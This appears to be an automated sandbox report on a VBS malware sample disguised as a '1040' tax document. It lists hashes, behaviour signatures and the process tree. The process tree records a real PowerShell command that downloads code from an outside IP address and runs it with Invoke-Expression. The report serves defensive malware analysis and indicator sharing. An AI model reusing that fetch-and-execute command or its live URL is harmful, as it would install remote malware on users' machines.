Analysis
- max time kernel: 121s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 05/03/2024, 20:39
Static task: static1
Behavioral task: behavioral1
- Sample: 1040documentpdf.vbs
- Resource: win7-20240221-en
- 4 signatures
- 150 seconds
Behavioral task: behavioral2
- Sample: 1040documentpdf.vbs
- Resource: win10v2004-20240226-en
- 11 signatures
- 150 seconds
General
- Target: 1040documentpdf.vbs
- Size: 5KB
- MD5: e02b999dc0c9c4bba51b28c6e733055a
- SHA1: 5eb9ebe7b853dc4bb3167f7d935ee9b62ab9fbb0
- SHA256: 4d86f191c4d7a5684116b671618669ec2bdd6bc08337fa2573c773386a14b2df
- SHA512: 5713f924b7d88072b1bbf61089802f4ffddcb84c431cf9caa0ff02330e6070fe27259aba2e7455e2b113ed3740c8fea579199c5fc8242f10cb792fb2b35312d6
- SSDEEP: 96:wwUEmyDTEBzylU+/V9rkcQ3tZUHg4KRZZoPC8Wuo9d3uV0I:wwU0TEBzj+/V9g/tZUHg4KR/oa8Wuo9u
Score: 3/10
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid 1296, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description: Token: SeDebugPrivilege; pid 1296; process powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description: PID 2156 wrote to memory of 1296; pid 2156; process WScript.exe; procid_target 28
  description: PID 2156 wrote to memory of 1296; pid 2156; process WScript.exe; procid_target 28
  description: PID 2156 wrote to memory of 1296; pid 2156; process WScript.exe; procid_target 28
Processes
- C:\Windows\System32\WScript.exe (PID 2156)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1040documentpdf.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1296)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '45.140.146.2:443/ivpzhehw')
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken